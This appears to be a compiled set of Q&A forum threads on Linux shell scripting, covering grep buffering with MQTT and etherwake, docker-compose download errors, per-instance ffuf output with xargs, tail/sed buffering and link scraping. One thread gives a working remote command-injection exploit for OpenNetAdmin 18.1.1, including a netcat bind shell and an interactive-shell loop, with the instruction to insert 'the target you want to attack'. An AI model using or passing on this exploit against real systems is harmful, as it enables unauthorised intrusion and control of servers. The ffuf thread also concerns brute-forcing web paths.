Linux shell script stops after first line

I am trying to execute etherwake based on an MQTT topic.
The output of mosquitto_sub stops if I pipe it into a while statement.
works:
# mosquitto_sub -L mqtt://... | grep -o -E '([[:xdigit:]]{2}:){5}[[:xdigit:]]{2}'
00:00:00:00:de:ad
00:00:00:00:be:ef
00:00:00:00:ca:fe
(goes on and on)
does not work:
mosquitto_sub -L mqtt://... \
| grep -o -E '([[:xdigit:]]{2}:){5}[[:xdigit:]]{2}' \
| hexdump
Output stops after a single line:
0000000 1234 5678 9abc def0 abcd cafe 3762 3a65
The big picture is this:
mosquitto_sub -L mqtt://... \
| grep -o -E '([[:xdigit:]]{2}:){5}[[:xdigit:]]{2}' \
| while read macaddr; do
echo "send WOL to " $macaddr;
/usr/bin/etherwake -D -b "$macaddr" 2>&1;
done
Usually I am fine with the Linux shell, but this time it simply gets stuck after the first line.
My guess is that there is some problem with stdin or stdout (not being read, or full, etc.), but I am out of ideas.
By the way, it's an OpenWrt shell, so ash and not bash.

The problem is indeed the buffering of grep when used with pipes.
Usually the --line-buffered switch should be used to force grep to process the data line by line instead of buffering it.
Because grep on OpenWrt (BusyBox) does not have this switch, awk is used instead:
mosquitto_sub -L mqtt://... \
| awk '/([[:xdigit:]]{2}:){5}[[:xdigit:]]{2}/{ print $0 }' \
| hexdump
If a non-BusyBox grep is in use, the solution would be:
mosquitto_sub -L mqtt://... \
| grep -o --line-buffered -E '([[:xdigit:]]{2}:){5}[[:xdigit:]]{2}' \
| hexdump
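For the big picture, the same substitution works in front of the while loop. A sketch, reusing the etherwake call from the question unchanged (note that, unlike grep -o, awk prints the whole matching line, so this assumes each MQTT payload is just a MAC address):
mosquitto_sub -L mqtt://... \
| awk '/([[:xdigit:]]{2}:){5}[[:xdigit:]]{2}/{ print $0 }' \
| while read macaddr; do
    # one Wake-on-LAN packet per MAC address published on the topic
    echo "send WOL to $macaddr"
    /usr/bin/etherwake -D -b "$macaddr" 2>&1
done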
Thank you all a lot for your help.

Related

Linux curl : no url found (or) curl: malformed url

I am downloading the Docker setup on my Linux VM and have to run this command as part of the steps. Even though it mentions a URL (and I changed -o to -O once), I am still getting those errors. What can I do about this?
This is the command I'm running:
sudo curl -L $(curl -L https://api.github.com/repos/docker/compose/releases/latest | grep "browser_download_url" | grep "$(uname -s)-$(uname -m)\"" | sed -nr 's/\s+"browser_download_url":\s+"(https.*)"/\1/p') -o /usr/local/bin/docker-compose
The grep that filters for the system you are running uses $(uname -s), which outputs Linux with an uppercase L; if the asset name is lowercase, the match fails. This may be the cause of your errors. Try a case-insensitive match:
sudo curl -L $(curl -L https://api.github.com/repos/docker/compose/releases/latest | grep "browser_download_url" | grep -i "$(uname -s)-$(uname -m)\"" | sed -nr 's/\s+"browser_download_url":\s+"(https.*)"/\1/p') -o /usr/local/bin/docker-compose
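If it still fails, run the inner pipeline on its own first and check that it prints exactly one download URL before handing it to the outer curl:
# debug step: inspect the URL the inner pipeline resolves to
curl -L https://api.github.com/repos/docker/compose/releases/latest \
| grep "browser_download_url" \
| grep -i "$(uname -s)-$(uname -m)\"" \
| sed -nr 's/\s+"browser_download_url":\s+"(https.*)"/\1/p'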
Hope this helps!

Bash Syntax Problems for Exploit

I found an exploit on Exploit-DB for OpenNetAdmin 18.1.1.
I have to adjust this script so that it works for me, but I can't get it done.
This is what I have so far:
URL="xxx.xxx.xxx.xxx/ona"
while true;do
echo -n {"nc -e /bin/sh xxx.xxx.xxx.xxx 4444 "}; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
The output is just:
{nc -e /bin/sh xxx.xxx.xxx.xxx 4444 }
I am a bit struggling with the syntax.
What did I do wrong?
This is what you want if you just need to launch the nc program. The script assumes that the remote machine is a Linux machine, with /bin/bash and an nc (netcat) compiled with -e support:
#!/bin/bash
URL="http://.../ona"
cmd="nc -l -p 4444 -e /bin/sh"
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
I found a solution that fits:
#!/bin/bash
URL="http://xxx.xxx.xxx.xxx/ona/"
while true;do
echo -n "{/bin/sh -i}"; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
Just replace the xxx.xxx.xxx.xxx with the target you want to attack and save the script as shell.sh.
Now run the script with ./shell.sh and you get an interactive shell on the target system.
To verify, you can type pwd or id and check whether you were successful.
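As an aside, the prompt-then-read pattern at the top of the loop is less fragile with read's -p option than with echo -n and braces. A minimal sketch (prompt text chosen here for illustration):
# -p prints the prompt without a trailing newline, then reads a line into cmd
read -p "shell> " cmd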

How to store output for every xargs instance separately

cat domains.txt | xargs -P10 -I % ffuf -u %/FUZZ -w wordlist.txt -o output.json
ffuf is used for directory and file brute-forcing, while domains.txt contains valid HTTP and HTTPS URLs like http://example.com and http://example2.com. I used xargs to speed up the process by running 10 parallel instances. The problem is that I am unable to store the output of each instance separately: output.json gets overwritten by every running instance. Is there anything we can do to make output.json unique for every instance so that all data gets saved separately? I tried ffuf/$(date '+%s').json instead, but it didn't work either.
Sure. Just name your output file using the domain. E.g.:
xargs -P10 -I % ffuf -u %/FUZZ -w wordlist.txt -o output-%.json < domains.txt
(I dropped cat because it was unnecessary.)
I missed the fact that your domains.txt file is actually a list of URLs rather than a list of domain names. I think the easiest fix is to simplify domains.txt to just domain names, but you could also try something like:
xargs -P10 -I % sh -c 'domain="%"; ffuf -u %/FUZZ -w wordlist.txt -o output-${domain##*/}.json' < domains.txt
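For reference, ${domain##*/} removes the longest prefix matching */ (everything up to the last slash), which is what turns the URL back into a bare host name. A quick check:
domain="http://example.com"
echo "${domain##*/}"   # prints: example.com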
cat domains.txt | xargs -P10 -I % sh -c "ping % > output.json.%"
Like this, your "%" can be part of the file name. (I changed your command to ping for my testing.)
So maybe something more like this:
cat domains.txt | xargs -P10 -I % sh -c "ffuf -u %/FUZZ -w wordlist.txt -o output.json.%"
I would replace your ffuf command with the following script and call that from the xargs command. It just strips the invalid file-name characters (the ://) and replaces them with a dot, then runs the command:
#!/usr/bin/bash
URL="$1"
# turn the URL into a usable file name by replacing :// with a dot
FILE="$(echo "$URL" | sed 's/:\/\//./g')"
ffuf -u "${URL}/FUZZ" -w wordlist.txt -o "output-${FILE}.json"
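Assuming the script is saved as run-ffuf.sh (a name chosen here for illustration) and made executable, the xargs call becomes:
chmod +x run-ffuf.sh
xargs -P10 -I % ./run-ffuf.sh % < domains.txt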

Redirecting tail output into a program

I want to send a program the most recent lines from a text file using tail as stdin.
First, I echo to the program some input that will be the same every time; then I send in tail input from an input file, which should first be processed through sed. The following is the command line that I expect to work, but when the program runs it only receives the echo input, not the tail input.
(echo "new" && tail -f ~/inputfile 2> /dev/null | sed -n -r 'some regex' && cat) | ./program
However, the following works exactly as expected, printing everything out to the terminal:
echo "new" && tail -f ~/inputfile 2> /dev/null | sed -n -r 'some regex' && cat
So I tried with another type of output, and again while the echoed text posted, the tail text does not appear anywhere:
(echo "new" && tail -f ~/inputfile 2> /dev/null | sed -n -r 'some regex') | tee out.txt
This made me think it is a problem with buffering, but I tried the unbuffer program and all the other advice here (https://superuser.com/questions/59497/writing-tail-f-output-to-another-file) without results. Where is the tail output going, and how can I get it to go into my program as expected?
The buffering problem was resolved when I prefixed the sed command with the following:
stdbuf -i0 -o0 -e0
Much preferable to using unbuffer, which didn't even work for me. Dave M's suggestion of sed's relatively new -u switch also seems to do the trick.
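Applied to the pipeline from the question, the prefix goes directly in front of sed (keeping the placeholder regex):
(echo "new" && tail -f ~/inputfile 2> /dev/null | stdbuf -i0 -o0 -e0 sed -n -r 'some regex' && cat) | ./program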
One thing you may be getting confused by: | (pipe) binds more tightly than && (sequential execution). So when you say
(echo "new" && tail -f ~/inputfile 2> /dev/null | sed -n -r 'some regex' && cat) | ./program
that is equivalent to
(echo "new" && (tail -f ~/inputfile 2> /dev/null | sed -n -r 'some regex') && cat) | ./program
So the cat isn't really doing anything, and the sed output is probably buffered a bit. You can try using the -u option to sed to get it to use unbuffered output:
(echo "new" && (tail -f ~/inputfile 2> /dev/null | sed -n -u -r 'some regex')) | ./program
I believe some versions of sed default to unbuffered output when writing to a terminal and buffered output when writing to a pipe, so that may be the source of the difference you're seeing.
You can use the i command in sed (see the command list in the manpage for details) to do the inserting at the beginning:
tail -f inputfile | sed -e '1inew file' -e 's/this/that/' | ./program

Search for string within html link on webpage and download the linked file

I am trying to write a Linux script to search for a link on a web page and download the file from that link.
the webpage is:
http://ocram.github.io/picons/downloads.html
The link I am interested in is:
"hd.reflection-black.7z"
The original way I was doing this was with these commands:
lynx -dump -listonly http://ocram.github.io/picons/downloads.html &> output1.txt
cat output1.txt | grep "17" &> output2.txt
cut -b 1-6 --complement output2.txt &> output3.txt
wget -i output3.txt
I am hoping there is an easier way to search the web page for the link "hd.reflection-black.7z" and save the linked file.
The files are stored on Google Drive, which does not include the filename in the URL, hence the grep "17" in the second line of code above.
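For reference, the four steps can be collapsed into a single pipeline with no intermediate files, though it still relies on the same grep "17" hack:
lynx -dump -listonly http://ocram.github.io/picons/downloads.html 2> /dev/null \
| grep "17" \
| cut -b 1-6 --complement \
| xargs wget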
@linuxnoob, if you want to download the file (curl is more powerful than wget):
curl -L --compressed `(curl --compressed "http://ocram.github.io/picons/downloads.html" 2> /dev/null | \
grep -o '<a .*href=.*>' | \
sed -e 's/<a /\n<a /g' | \
grep hd.reflection-black.7z | \
sed -e 's/<a .*href=['"'"'"]//' -e 's/["'"'"'].*$//' -e '/^$/ d')` > hd.reflection-black.7z
without indentation, for your script:
curl -L --compressed `(curl --compressed "http://ocram.github.io/picons/downloads.html" 2> /dev/null | grep -o '<a .*href=.*>' | sed -e 's/<a /\n<a /g' | grep hd.reflection-black.7z | sed -e 's/<a .*href=['"'"'"]//' -e 's/["'"'"'].*$//' -e '/^$/ d')` > hd.reflection-black.7z 2>/dev/null
You can try it!
What about this?
curl --compressed "http://ocram.github.io/picons/downloads.html" | \
grep -o '<a .*href=.*>' | \
sed -e 's/<a /\n<a /g' | \
grep hd.reflection-black.7z | \
sed -e 's/<a .*href=['"'"'"]//' -e 's/["'"'"'].*$//' -e '/^$/ d'
I'd try to avoid using regular expressions, since they tend to break in unexpected ways (e.g. when the output is split across more than one line for some reason).
I suggest to use a scripting language like Ruby or Python, where higher level tools are available.
The following example is in Ruby:
#!/usr/bin/ruby
require 'rubygems'
require 'nokogiri'
require 'open-uri'

main_url = ARGV[0] # e.g. 'http://ocram.github.io/picons/downloads.html'
filename = ARGV[1] # e.g. 'hd.reflection-black.7z'

# find the <a> element whose text is the wanted file name and take its href
doc = Nokogiri::HTML(open(main_url))
url = doc.xpath("//a[text()='#{filename}']").first['href']

File.open(filename, 'w+') do |file|
  open(url, 'r') do |link|
    IO.copy_stream(link, file)
  end
end
Save it to a file like fetcher.rb and then you can use it with
ruby fetcher.rb http://ocram.github.io/picons/downloads.html hd.reflection-black.7z
To make it work you'll have to install Ruby and the Nokogiri library (both are available in most distros' repositories).
